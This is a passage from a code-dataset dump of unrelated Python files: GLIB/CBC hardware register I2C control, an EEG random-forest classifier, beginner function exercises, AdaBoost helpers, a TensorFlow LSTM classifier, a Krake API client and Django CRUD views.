have the same length')\r\n mismatches = []\r\n for i, (bw, br) in enumerate(zip(blocks, blocks_read)):\r\n if bw != br:\r\n mismatches.append((i, (bw, br)))\r\n return mismatches\r\n\r\n\r\n\r\n def write_from_file(self, filename):\r\n tree = et.parse(filename)\r\n root = tree.getroot()\r\n registers = []\r\n for node in root:\r\n if node.tag == 'Register':\r\n registers.append((node.attrib['name'], int(node.text)))\r\n self.write_multiple_registers(registers)\r\n\r\n\r\n\r\n\r\n\r\n # 24 bits = 3 for frontend_id > 4 for cbc_id > 1 for page > 8 for address > 8 for value\r\n def _cbc_register_to_block(self, frontend_id, cbc_id, page, address, value):\r\n return frontend_id<<21 | cbc_id<<17 | page<<16 | address<<8 | value\r\n def _block_to_cbc_register(self, register):\r\n reg=bin(register)[2:].zfill(24)\r\n return int(reg[:-21], base=2), int(reg[-20:-17], base=2), int(reg[-17:-16], base=2), int(reg[-16:-8], base=2), int(reg[-8:], base=2)\r\n def _wait_for_i2c_ack(self, ackval, dummy):\r\n wait_length = 0.001\r\n while not self.read_register('cbc_i2c_cmd_ack') == ackval:\r\n time.sleep(wait_length)\r\n # print('waiting ... for i2c cmd ack '+str(ackval)+' '+str(dummy))\r\n def _wait_for_cmd_start_valid(self):\r\n wait_length = 0.001\r\n while self.read_register('user_wb_ttc_fmc_regs.status_flags.CMD_START_VALID') == 0:\r\n time.sleep(wait_length)\r\n # print('waiting for cmd start valid')\r\n def _wait_for_sram_full(self, sram_full, ack_value, info=''):\r\n wait_length = 0.001\r\n while self.read_register(sram_full) == ack_value:\r\n time.sleep(wait_length)\r\n # print('waiting sram full '+str(ack_value)+' '+info)\r\n\r\n\r\n
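 # Round-trip sanity sketch for the packing helpers above (hand-checked, hypothetical field values):\r\n # pack: 1<<21 | 2<<17 | 1<<16 | 0x1F<<8 | 0xA5 == 0x251FA5\r\n # unpack: _block_to_cbc_register(0x251FA5) -> (1, 2, 1, 0x1F, 0xA5)\r\n\r\n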
 def update_cbcs(self, **kwargs):\r\n write = kwargs.get('write', True)\r\n debug = kwargs.get('debug', 'diff') # diff, full\r\n self.cbcs = kwargs.get('cbcs', self.cbcs) # replace existing cbcs with the configurations\r\n if debug:\r\n debugw = True\r\n else:\r\n debugw = False\r\n\r\n blocks_write = [] # data to be written to the glib sram\r\n control_data = [] # control data / needed to check back\r\n for n, cbc in enumerate(self.cbcs):\r\n for name in sorted(cbc.registers.keys()):\r\n value = cbc.registers[name]\r\n page, address, default = cbc2.cbc2.registers_name2address[name]\r\n control_data.append((name, self.__frontend_id, n, page, address, value))\r\n blocks_write.append(self._cbc_register_to_block(self.__frontend_id, n, page, address, value))\r\n blocks_write.append(0xFFFFFFFF)\r\n\r\n # enable i2c-ctrl\r\n self.write_register('user_wb_ttc_fmc_regs.cbc_reg_i2c_settings', 0x000009F4)\r\n time.sleep(0.001)\r\n\r\n # fill data into sram for i2c transaction\r\n self.write_register(self.__sram1_user_logic, 0)\r\n write_diff = self.write_sram_blocks(self.__sram1, blocks_write, debug=debugw)\r\n self.write_register(self.__sram1_user_logic, 1)\r\n\r\n self.write_register(self.__sram2_user_logic, 0)\r\n self.write_register(self.__sram2, 0xFFFFFFFF)\r\n self.write_register(self.__sram2_user_logic, 1)\r\n\r\n # hard reset of the chip\r\n # if write:\r\n # self.write_register(self.__cbc_hard_reset, 1)\r\n # time.sleep(0.01)\r\n # self.write_register(self.__cbc_hard_reset, 0)\r\n # time.sleep(0.01)\r\n\r\n\r\n # make the fw chew the i2c blocks\r\n if write:\r\n self.write_register(self.__cbc_i2c_req, 3)\r\n else:\r\n self.write_register(self.__cbc_i2c_req, 1)\r\n self._wait_for_i2c_ack(1, 'write0')\r\n self.write_register(self.__cbc_i2c_req, 0)\r\n self._wait_for_i2c_ack(0, 'write1')\r\n\r\n # read back values from i2c\r\n self.write_register(self.__sram1_user_logic, 0)\r\n blocks_read = self.read_sram_blocks(self.__sram1, len(blocks_write))\r\n self.write_register(self.__sram1_user_logic, 1)\r\n #self.write_register(self.__sram2_user_logic, 0)\r\n #self.write_register(self.__sram2_user_logic, 1)\r\n self.write_register(self.__cbc_i2c_req, 0)\r\n self._wait_for_i2c_ack(0, 'read')\r\n\r\n # disable i2c-ctrl\r\n self.write_register('user_wb_ttc_fmc_regs.cbc_reg_i2c_settings', 0)\r\n time.sleep(0.001)\r\n\r\n\r\n if not (len(control_data)+1 == len(blocks_write) == len(blocks_read)):\r\n raise Exception('unequal length between control+1('+str(len(control_data)+1)+'), write('+str(len(blocks_write))+') and read('+str(len(blocks_read))+')')\r\n\r\n if debug in ('diff', 'full') :\r\n result = []\r\n\r\n # loop variables renamed so they no longer shadow the write flag used below\r\n for i, (read_word, write_word, control) in enumerate(zip(blocks_read, blocks_write, control_data)):\r\n control_name, control_fe_id, control_cbc_id, control_page, control_address, control_value = control\r\n write_fe_id, write_cbc_id, write_page, write_address, write_value = self._block_to_cbc_register(write_word)\r\n read_fe_id, read_cbc_id, read_page, read_address, read_value = self._block_to_cbc_register(read_word)\r\n\r\n if write: #allow no differences when writing to sram\r\n if (not (control_fe_id == write_fe_id == read_fe_id) or\r\n not (control_cbc_id == write_cbc_id == read_cbc_id) or\r\n not (control_page == write_page == read_page) or\r\n not (control_address == write_address == read_address) or\r\n not (control_value == write_value == read_value) and\r\n debug == 'diff') or (debug=='full'):\r\n\r\n result.append((\r\n control_name,\r\n (control_fe_id, write_fe_id, read_fe_id),\r\n (control_cbc_id, write_cbc_id, read_cbc_id),\r\n (control_page, write_page, read_page),\r\n (control_address, write_address, read_address),\r\n (control_value, write_value, read_value)\r\n ))\r\n else: # allow differences between values and update cbc value\r\n if (not (control_fe_id == write_fe_id == read_fe_id) or\r\n not (control_cbc_id == write_cbc_id == read_cbc_id) or\r\n not (control_page == write_page == read_page) or\r\n not (control_address == write_address == read_address) and debug == 'diff') or debug=='full':\r\n\r\n result.append((\r\n control_name,\r\n (control_fe_id, write_fe_id, read_fe_id),\r\n (control_cbc_id, write_cbc_id, read_cbc_id),\r\n (control_page, write_page, read_page),\r\n (control_address, write_address, read_address),\r\n (control_value, write_value, read_value)\r\n ))\r\n self.cbcs[control_cbc_id].registers[control_name] = read_value\r\n\r\n return write_diff, result\r\n\r\n","sub_path":"trkpy/hardware/glib.py","file_name":"glib.py","file_ext":"py","file_size_in_byte":24862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"111025282","text":"\"\"\"\nAuthor: Yash Patel\nName: EEGPredict.py\nDescription: Given the readings of an EEG measuring the \nfrequencies of signals, determine what type of motion was conducted\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport csv as csv\nfrom sklearn.ensemble import RandomForestClassifier\n\nNUM_COLUMNS = 32\n\nNUM_SUBJECTS = 12\nNUM_SERIES = 8\nNUM_TESTS = 2\nSTART_TEST = 9\n\n# Offset used to account for counting index in loops\nOFFSET = 1\n\n
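# A tiny hand-checked illustration of the row-difference encoding used below\n# (toy frame, not real EEG data):\n# x = [1, 4, 9] -> x - x.shift(1) = [NaN, 3, 5]\n\n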
def formatData(data):\n \"\"\"Takes in data and returns a new dataframe with each\n row corresponding to the difference between the original row\n and the one preceding it (first row defaults to 0s)\n\n Keyword arguments:\n data -- read-in data (formatted as Pandas dataframe)\n \"\"\"\n\n ids = data['id']\n train_diff = data.drop(['id'], axis=1) - \\\n data.shift(1).drop(['id'], axis=1)\n train_diff['id'] = ids\n\n default_row = [0 for x in range(NUM_COLUMNS)]\n default_row.append(ids[0])\n train_diff.loc[train_diff['id'] == ids[0]] = default_row\n train_diff = train_diff.drop(['id'], axis=1)\n return train_diff\n\ndef train():\n \"\"\"Trains the machine learning algorithm. Returns a predictor\n lookup dictionary formatted as {subject # : random forest predictor}\n \"\"\"\n\n predictorLookup = {}\n\n # Used for keying the joined tables further down\n START_LETTER = ord('a')\n END_LETTER = START_LETTER + NUM_SERIES\n keyLetters = [chr(letter) for letter in range(\n START_LETTER, END_LETTER)]\n\n for subject in range(NUM_SUBJECTS):\n data_frames = []\n events_frames = []\n curSubject = subject + OFFSET\n \n for series in range(NUM_SERIES):\n curSeries = series + OFFSET\n\n print(\"Reading data for subject {}...\"\n .format(curSubject))\n \n dataFile = \"train\\\\subj{}_series{}_data.csv\"\\\n .format(curSubject, curSeries)\n eventsFile = \"train\\\\subj{}_series{}_events.csv\"\\\n .format(curSubject, curSeries)\n\n cur_train_data = pd.read_csv(dataFile)\n cur_train_events = pd.read_csv(eventsFile)\n\n cur_train_data = formatData(cur_train_data)\n cur_train_events = cur_train_events.drop(['id'], axis=1)\n\n data_frames.append(cur_train_data)\n events_frames.append(cur_train_events)\n\n train_data = pd.concat(data_frames, keys=keyLetters)\n train_events = pd.concat(events_frames, keys=keyLetters)\n\n print(\"Fitting data for subject {}...\"\n .format(curSubject))\n clf = RandomForestClassifier(n_estimators=100)\n clf.fit(train_data, train_events)\n\n predictorLookup[curSubject] = clf\n\n return predictorLookup\n\ndef test(predictorLookup):\n \"\"\"Given the predictors determined for each of the subjects, \n performs predictions and writes output for test data. Return void\n\n Keyword arguments:\n predictorLookup -- dictionary formatted as {subject # : random forest predictor}\n used for performing predictions for each subject\n \"\"\"\n\n for subject in range(NUM_SUBJECTS):\n for test in range(NUM_TESTS):\n curTest = START_TEST + test\n curSubject = subject + OFFSET\n\n print(\"Performing predictions for subject {}...\"\n .format(curSubject))\n testFile = \"test\\\\subj{}_series{}_data.csv\"\\\n .format(curSubject, curTest)\n\n test_data = pd.read_csv(testFile)\n ids = test_data['id']\n test_data = formatData(test_data)\n\n clf = predictorLookup[curSubject]\n test_results = [clf.predict(test).tolist() \\\n for test in test_data.values][0]\n\n writeResults(ids, test_results, curSubject, curTest)\n\ndef writeResults(ids, test_results, subject, test):\n \"\"\"Writes results of the test predictions. 
Returns void\n\n Keyword arguments:\n ids -- Ids of all the trials\n test_results -- Results from random forest predictions\n subject -- Current subject # being predicted\n test -- Current test #\n \"\"\"\n\n predictions_file = open(\"test\\\\subj{}_series{}_events.csv\"\n .format(subject, test), \"wb\")\n open_file_object = csv.writer(predictions_file)\n\n headers = ['id', 'HandStart', 'FirstDigitTouch', \\\n 'BothStartLoadPhase', 'LiftOff', 'Replace', 'BothReleased']\n open_file_object.writerow(headers)\n open_file_object.writerows(zip(ids, test_results))\n predictions_file.close()\n\ndef main():\n predictorLookup = train()\n test(predictorLookup)\n\nif __name__ == \"__main__\":\n main()","sub_path":"EEGMove/EEGPredict.py","file_name":"EEGPredict.py","file_ext":"py","file_size_in_byte":4579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"546359057","text":"# WARMUP SECTION:\nprint('WARMUP SECTION\\n')\n\n# LESSER OF TWO EVENS:\n# Write a function that returns the lesser of two given numbers if both numbers are even,\n# but returns the greater if one or both numbers are odd\ndef lesser_of_two_evens(a,b):\n if a%2 == 0 and b%2 == 0:\n return min(a,b)\n else:\n return max(a,b)\nprint('LESSER OF TWO EVENS\\t{}'.format(lesser_of_two_evens(4,56)))\n\n\n# ANIMAL CRACKERS:\n# Write a function takes a two-word string and returns True if both words begin with same letter\ndef animal_crackers(text):\n splited = text.lower().split()\n return splited[0][0] == splited[1][0]\nprint('ANIMAL CRACKERS\\t{}'.format(animal_crackers('Eben Jenkin')))\nprint('ANIMAL CRACKERS\\t{}'.format(animal_crackers('Jennis Joyal')))\n\n\n# MAKES TWENTY:\n# Given two integers, return True if the sum of the integers is 20 or if one of the integers is 20.\n# If not, return False\ndef makes_twenty(n1,n2):\n return n1 == 20 or n2 == 20 or n1+n2 == 20\nprint('MAKES TWENTY\\t{}'.format(makes_twenty(20,34)))\nprint('MAKES TWENTY\\t{}'.format(makes_twenty(12,8)))\nprint('MAKES TWENTY\\t{}'.format(makes_twenty(23,78)))\n\n\n# LEVEL 1 PROBLEMS\nprint('\\nLEVEL 1 PROBLEMS\\n')\n\n# OLD MACDONALD:\n# Write a function that capitalizes the first and fourth letters of a name\ndef old_macdonald(name):\n # first_letter = name[0].upper()\n # fourth_letter = name[3].upper()\n # return first_letter + name[1:3] + fourth_letter + name[4:]\n first_half = name[:3].capitalize()\n second_half = name[3:].capitalize()\n return first_half+second_half\nprint('OLD MACDONALD\\t{}'.format(old_macdonald('sangi')))\n\n\n# MASTER YODA:\n# Given a sentence, return a sentence with the words reversed\ndef master_yoda(text):\n my_list = text.split()\n my_list = my_list[::-1]\n return ' '.join(my_list)\nprint('MASTER YODA\\t{}'.format(master_yoda('I am pree')))\n\n\n# ALMOST THERE:\n# Given an integer n, return True if n is within 10 of either 100 or 200\ndef almost_there(n):\n return abs(100-n) <= 10 or abs(200-n) <= 10 # abs() removes negative sign\nprint('ALMOST THERE\\t{}'.format(almost_there(90)))\n\n\n# LEVEL 2 PROBLEMS\nprint('\\nLEVEL 2 PROBLEMS\\n')\n\n# FIND 33:\n# Given a list of ints, return True if the array contains a 3 next to a 3 somewhere.\ndef has_33(my_list):\n for index,n in enumerate(my_list):\n if n == 3 and my_list[index+1] == 3:\n return True\n else:\n continue\n return False\nprint('FIND 33\\t{}'.format(has_33([1,3,2,3,7])))\n\n\n# PAPER DOLL:\n# Given a string, return a string where for every character in the original there are three characters\ndef paper_doll(str):\n new_str = 
[letter+letter+letter for letter in str ]\n return ''.join(new_str)\nprint('PAPER DOLL\\t{}'.format(paper_doll('sangi')))\n\n\n# BLACKJACK:\n# Given three integers between 1 and 11, if their sum is less than or equal to 21, return their sum.\n# If their sum exceeds 21 and there's an eleven, reduce the total sum by 10.\n# Finally, if the sum (even after adjustment) exceeds 21, return 'BUST'\ndef blackjack(n1,n2,n3):\n total = n1+n2+n3\n my_tup = (n1,n2,n3)\n total_11 = my_tup.count(11)\n if total <= 21:\n return total\n elif total_11 > 0:\n total = total - (total_11 * 10)\n if total <= 21:\n return total\n else:\n return 'BUST'\n else:\n return 'BUST'\nprint('BLACKJACK\\t{}'.format(blackjack(11,11,2)))\nprint('BLACKJACK\\t{}'.format(blackjack(5,6,7))) # --> 18\nprint('BLACKJACK\\t{}'.format(blackjack(9,9,9))) # --> 'BUST'\nprint('BLACKJACK\\t{}'.format(blackjack(9,9,11))) # --> 19\n\n\n# SUMMER OF '69:\n# Return the sum of the numbers in the array,\n# except ignore sections of numbers starting with a 6 and extending to the next 9\n# (every 6 will be followed by at least one 9). Return 0 for no numbers.\ndef summer_69(my_list):\n if 6 not in my_list:\n return sum(my_list)\n else:\n index_6 = my_list.index(6)\n index_9 = my_list.index(9)\n return sum(my_list[0:index_6]) + sum(my_list[index_9+1:])\nprint('SUMMER OF 69\\t{}'.format(summer_69([1,3,5,6,9,5])))\n\n\n# CHALLENGING PROBLEMS\nprint('\\nCHALLENGING PROBLEMS\\n')\n\n# SPY GAME:\n# Write a function that takes in a list of integers and returns True if it contains 007 in order\ndef spy_game(my_list):\n if 0 in my_list:\n first_index = my_list.index(0)\n if 0 in my_list[first_index+1:]:\n second_index = my_list[first_index+1:].index(0) + first_index\n return 7 in my_list[second_index+1:]\n else:\n return False\n else:\n return False\nprint('SPY GAME\\t{}'.format(spy_game([1,2,4,0,0,7,5]))) # --> True\nprint('SPY GAME\\t{}'.format(spy_game([1,0,2,4,0,5,7]))) # --> True\nprint('SPY GAME\\t{}'.format(spy_game([1,7,2,0,4,5,0]))) # --> False\n\ndef spy_game_sol(my_list):\n code = [0,0,7,'x']\n for num in my_list:\n if num == code[0]:\n code.pop(0)\n return len(code) == 1\nprint('SPY GAME\\t{}'.format(spy_game_sol([1,2,4,0,0,7,5]))) # --> True\nprint('SPY GAME\\t{}'.format(spy_game_sol([1,0,2,4,0,5,7]))) # --> True\nprint('SPY GAME\\t{}'.format(spy_game_sol([1,7,2,0,4,5,0]))) # -->\n\n\n# COUNT PRIMES:\n# Write a function that returns the number of prime numbers that exist up to and including a given number\ndef count_primes(n):\n primes = [2]\n x = 3\n if n < 2:\n return 0\n while x <= n:\n for y in range(3,x,2):\n if(x%y == 0):\n x += 2\n break\n else: # else for for loop. 
Unique behaviour in python\n x += 2\n primes.append(x)\n return len(primes)\nprint('COUNT PRIMES\\t{}'.format(count_primes(100)))\n\n\n# PRINT BIG:\n# Write a function that takes in a single letter, and returns a 5x5 representation of that letter\n\ndef print_big(letter):\n patterns = {1:' * ',2:' * * ',3:'* *',4:'*****',5:'**** ',6:' * ',7:' * ',8:'* * ',9:'* '}\n alphabet = {'A':[1,2,4,3,3],'B':[5,3,5,3,5],'C':[4,9,9,9,4],'D':[5,3,3,3,5],'E':[4,9,4,9,4]}\n for pattern in alphabet[letter.upper()]:\n print(patterns[pattern])\n\nprint_big('a')","sub_path":"assessment_test/function_practice_exercise.py","file_name":"function_practice_exercise.py","file_ext":"py","file_size_in_byte":6167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"290073777","text":"import math\nimport csv\nimport random\n\n\ndef iterate(matches, sample_weight):\n error = 0\n if sample_weight is None:\n sample_weight = []\n for idx in range(len(matches)):\n sample_weight.append(float(1) / len(matches))\n for idx in range(len(matches)):\n if not matches[idx]:\n error += sample_weight[idx]\n print('error is ' + str(error))\n # if error > 0.5:\n # return True, None, None\n beta = error / (1 - error)\n clf_weight = math.log(1 / beta)\n new_sample_weight = []\n print('updating sample weights...')\n sum = 0\n for idx in range(len(matches)):\n if matches[idx]:\n new_sample_weight.append(sample_weight[idx] * beta)\n sum += sample_weight[idx] * beta\n else:\n new_sample_weight.append(sample_weight[idx])\n sum += sample_weight[idx]\n for idx in range(len(matches)):\n new_sample_weight[idx] /= sum\n print('done')\n return False, clf_weight, new_sample_weight\n\n\ndef merge(id, candid, weight):\n result = []\n print('merging...')\n for i in range(len(candid[0])):\n result.append(0)\n for i in range(len(weight)):\n for j in range(len(result)):\n result[j] += weight[i] * candid[i][j]\n print('done')\n with open('result/' + str(id) + '-weak.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(['id', 'label'])\n i = random.randint(0, len(weight) - 1)\n for idx, label in enumerate(candid[i]):\n writer.writerow([idx + 1, 1 if label > 0 else -1 if label < 0 else 0])\n with open('result/' + str(id) + '-standard.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(['id', 'label'])\n for idx, label in enumerate(result):\n writer.writerow([idx + 1, 1 if label > 0 else -1 if label < 0 else 0])\n with open('result/' + str(id) + '-strict.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(['id', 'label'])\n for idx, label in enumerate(result):\n writer.writerow([idx + 1, 1 if label > 0.05 else -1 if label < -0.05 else 0])\n with open('result/' + str(id) + '-loose.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(['id', 'label'])\n for idx, label in enumerate(result):\n writer.writerow([idx + 1, 1 if label > 0.25 else -1 if label < -0.25 else 0])","sub_path":"adaboost-dtree/adaboost.py","file_name":"adaboost.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"610974776","text":"import gzip\nimport os\nimport sys\nimport json\nfrom collections import defaultdict\n\nimport numpy as np\n\nimport tensorflow as tf\nfrom tensorflow.python.ops import rnn, rnn_cell\nimport tensorflow.python.platform\n\nclass config:\n batch_size = 128\n num_epochs = 100\n num_hidden = 64\n num_layers = 4\n max_seq_len = 60\n num_features = 40\n num_classes = 2\n\ndef 
create_batches(input_data):\n \"\"\"\n inputdata = [ {\"class\":0/1, \"sequence\";[]} ]\n output = dict[batch_id] = [ exemplar => (sequence, class, seq len) ]\n \"\"\"\n batchdict = defaultdict(list)\n for i, exemplar in enumerate(input_data):\n batch_id = int(i / config.batch_size)\n batchdict[batch_id].append( exemplar )\n\n return batchdict\n\n\ndef iter_batches(batches):\n for batch in batches.itervalues():\n yield zip(*[split_exemplar(exemplar) for exemplar in batch])\n\n\ndef split_exemplar(exemplar) :\n out_class = exemplar[\"class\"]\n padding = [0] * config.num_features\n raw_series_length = len(exemplar[\"sequence\"])\n input_sequence_length = min(raw_series_length, config.max_seq_len)\n\n input_sequence = [exemplar['sequence'][i] if i < raw_series_length else padding for i in xrange(config.max_seq_len)]\n\n return input_sequence, out_class, input_sequence_length\n\ndef _error_rate(predict_correct):\n \"\"\"Return the error rate given the correctness of each prediction.\"\"\"\n return 100.0 - (100.0 * np.mean(predict_correct))\n\ndef error_rate(predictions, labels):\n \"\"\"Return the error rate based category labels.\"\"\"\n return _error_rate(predictions == labels)\n\ndef error_rate_hots(predictions, labels):\n \"\"\"Return the error rate based on 1-hot representations.\"\"\"\n return _error_rate(np.argmax(predictions, 1) == np.argmax(labels, 1))\n\n\ndef create_graph(base_learning_rate = 0.01):\n \"\"\"\n TF LSTM Graph\n \"\"\"\n # This is where training samples and labels are fed to the graph.\n # These placeholder nodes will be fed a batch of training data at each\n # training step using the {feed_dict} argument to the Run() call below.\n\n #Place holder definition [ batch size , max input sequence length, number of features]\n #\n # batch_size => set to None, to dynamically deal with the final batch not being equal in size\n # max_input_len => of the batch?\n # num_feat => number of features\n\n\ndef last_relevant(output, length):\n\n batch_size = tf.shape(output)[0]\n max_length = tf.shape(output)[1]\n out_size = int(output.get_shape()[2])\n index = tf.range(0, batch_size) * max_length + (length -1)\n flat = tf.reshape(output, [-1, out_size])\n relevant = tf.gather(flat, index)\n\n return relevant\n\nclass LSTMNet(object): pass\n\ndef build_lstm_layers(output_keep_prob):\n\n # First, create a basic LSTM layer that will be reused\n lstm_layer = rnn_cell.BasicLSTMCell(config.num_hidden, state_is_tuple=True)\n\n # Add dropout to this layer, but only during training\n lstm_layer = rnn_cell.DropoutWrapper(lstm_layer, output_keep_prob=output_keep_prob)\n\n # Stack this layer repeatedly to construct a directional LSTM network\n lstm_network = rnn_cell.MultiRNNCell([lstm_layer] * config.num_layers, state_is_tuple=True)\n\n # The variables below hold all the trainable weights. 
They are passed an\n # initial value which will be assigned when when we call:\n # tf.initialize_all_variables().run()\n weights = tf.Variable(tf.random_normal([config.num_hidden, config.num_classes]))\n biases = tf.Variable(tf.random_normal([config.num_classes]))\n\n return lstm_network, weights, biases\n\n\ndef model(batched_input, sequence_length, output_keep_prob):\n\n forward_network, forward_weights, forward_biases = build_lstm_layers(output_keep_prob)\n backward_network, backward_weights, backward_biases = build_lstm_layers(output_keep_prob)\n\n outputs, state = rnn.bidirectional_dynamic_rnn(\n forward_network,\n backward_network,\n batched_input,\n sequence_length,\n dtype=tf.float32)\n\n # The network processes the entire series -- including the zero padding added to\n # the end of the series to ensure all series are the same length. In this network,\n # we want to pass the last state from both the forward and backward networks to\n # the final layer that integrates the two states. But since the network processes\n # the zero-padded time slices, we can't just take the final states produced by the\n # dynamic RNN above, instead we take the last _meaningful_ state, based on the\n # known sequence length\n forward_all_outputs, backward_all_outputs = outputs\n forward_output = last_relevant(forward_all_outputs, sequence_length)\n backward_output = last_relevant(backward_all_outputs, sequence_length)\n\n return tf.matmul(forward_output, forward_weights) + forward_biases + \\\n tf.matmul(backward_output, backward_weights) + backward_biases\n\n\ndef create_graph(learning_rate = 0.001):\n \"\"\"\n TF Graph that can ve run on mini batches of data\n \"\"\"\n\n # This is where training samples and labels are fed to the graph.\n # These placeholder nodes will be fed a batch of training data at each\n # training step using the {feed_dict} argument to the run() call below.\n\n batched_input = tf.placeholder(tf.float32, [None, config.max_seq_len, config.num_features])\n target_class = tf.placeholder(tf.int32, [None])\n #Binary Classification\n target_output = tf.one_hot(target_class, depth = config.num_classes)\n sequence_length = tf.placeholder(tf.int32, [None])\n output_keep_prob = tf.placeholder(tf.float32)\n\n # Training computation: logits + cross-entropy loss.\n logits = model(batched_input, sequence_length, output_keep_prob)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits, target_output))\n\n # Set up the optimizer\n batch = tf.Variable(0)\n #optimizer = tf.train.MomentumOptimizer(learning_rate, .95).minimize(loss, global_step=batch)\n optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss, global_step=batch)\n\n # Predict the class, or port, associated with the sequence\n prediction = tf.nn.softmax(logits)\n\n # TODO: make this a real class\n graph = LSTMNet()\n graph.batched_input = batched_input\n graph.target_class = target_class\n graph.target_output = target_output\n graph.sequence_length = sequence_length\n graph.output_keep_prob = output_keep_prob\n graph.prediction = prediction\n graph.optimizer = optimizer\n graph.loss = loss\n\n return graph","sub_path":"bl_lstm.py","file_name":"bl_lstm.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"102282675","text":"\"\"\"This module provides a simple Python client to the Krake HTTP API. 
It\nleverages the same data models as the API server from :mod:`krake.data`.\n\"\"\"\nfrom aiohttp import ClientSession, TCPConnector\nfrom yarl import URL\n\n\nclass Client(object):\n \"\"\"Simple async Python client for the Krake HTTP API.\n\n The specific APIs are implemented in separate classes. Each API object\n requires an :class:`Client` instance to interface the HTTP REST API.\n\n The client implements the asynchronous context manager protocol used to\n handle opening and closing the internal HTTP session.\n\n Example:\n .. code:: python\n\n from krake.client import Client\n from krake.client.core import CoreApi\n\n async with Client(\"http://localhost:8080\") as client:\n core_api = CoreApi(client)\n role = await core_api.read_role(name=\"reader\")\n\n \"\"\"\n\n def __init__(self, url, loop=None, ssl_context=None):\n self.loop = loop\n self.url = URL(url)\n self.session = None\n self.ssl_context = ssl_context\n\n async def __aenter__(self):\n await self.open()\n return self\n\n async def __aexit__(self, *exc):\n await self.close()\n\n async def open(self):\n \"\"\"Open the internal HTTP session and initializes all resource\n attributes.\n \"\"\"\n if self.session is not None:\n return\n\n connector = None\n if self.ssl_context:\n connector = TCPConnector(ssl_context=self.ssl_context)\n\n self.session = ClientSession(\n loop=self.loop, raise_for_status=True, connector=connector\n )\n\n async def close(self):\n \"\"\"Close the internal HTTP session and remove all resource attributes.\"\"\"\n if self.session is None:\n return\n await self.session.close()\n self.session = None\n","sub_path":"krake/krake/client/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"222832400","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom django.urls import reverse_lazy\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic import ListView, CreateView, DeleteView, UpdateView\n\nfrom apps.baliza.models import Area, Piso\nfrom apps.baliza.views.area.forms import AreaForm\n\n\n@method_decorator(login_required(login_url='signin'), name='dispatch')\nclass AreaListView(ListView):\n model = Area\n template_name = 'Ubicacion/AreaListView.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Listado Areas por Piso en Sede'\n context['list_url'] = reverse_lazy('project:form_create_area')\n context['create_url'] = reverse_lazy('project:form_create_area')\n context['entity'] = 'Sedes'\n return context\n\n\n@method_decorator(login_required(login_url='signin'), name='dispatch')\nclass AreaCreateView(CreateView):\n model = Area\n form_class = AreaForm\n template_name = 'FORM.html'\n success_url = reverse_lazy('project:form_readlist_area')\n\n def post(self, request, *args, **kwargs):\n data = dict()\n try:\n action = request.POST['action']\n if action == 'add':\n forms = AreaForm(request.POST)\n if forms.is_valid():\n area_sel = forms.cleaned_data['area']\n xInicial = forms.cleaned_data['xInicial']\n xFinal = forms.cleaned_data['xFinal']\n yInicial = forms.cleaned_data['yInicial']\n yFinal = forms.cleaned_data['yFinal']\n descripcion = forms.cleaned_data['descripcion']\n piso = forms.cleaned_data['piso']\n\n area = Area()\n area.area = area_sel\n area.xInicial = xInicial\n area.xFinal = xFinal\n area.yInicial = yInicial\n area.yFinal = 
yFinal\n area.descripcion = descripcion\n area.piso = piso\n area.usuarioRegistra = request.user\n area.save()\n data['redirec'] = reverse_lazy('project:form_readlist_area')\n else:\n data['error'] = 'Error en datos, favor intentelo de nuevo'\n else:\n data['error'] = 'No ha ingresado a ninguna opción'\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Crear un Area'\n context['action'] = 'add'\n context['entity'] = 'Crear Area'\n if Piso.objects.all().count() == 0:\n context['error'] = 'No hay una Piso creado para ninguna sede, por favor cree uno.'\n return context\n\n\n@method_decorator(login_required(login_url='signin'), name='dispatch')\nclass AreaUpdateView(UpdateView):\n model = Area\n form_class = AreaForm\n template_name = 'FORM.html'\n success_url = reverse_lazy('project:form_readlist_area')\n\n def dispatch(self, request, *args, **kwargs):\n self.object = self.get_object()\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = dict()\n try:\n action = request.POST['action']\n if action == 'edit':\n form = self.get_form()\n data = form.save()\n print(data)\n data['redirec'] = reverse_lazy('project:form_readlist_area')\n else:\n data['error'] = 'No ha ingresado a ninguna opción'\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Edición de un Area'\n context['action'] = 'edit'\n context['entity'] = 'Editar Area'\n return context\n\n@method_decorator(login_required(login_url='signin'), name='dispatch')\nclass AreaDeleteView(DeleteView):\n model = Area\n form_class = AreaForm\n template_name = 'DELETE.html'\n success_url = reverse_lazy('project:form_readlist_area')\n\n def dispatch(self, request, *args, **kwargs):\n self.object = self.get_object()\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n self.object.delete()\n data['redirec'] = reverse_lazy('project:form_readlist_area')\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Eliminación de un Area'\n context['entity'] = 'Sedes'\n 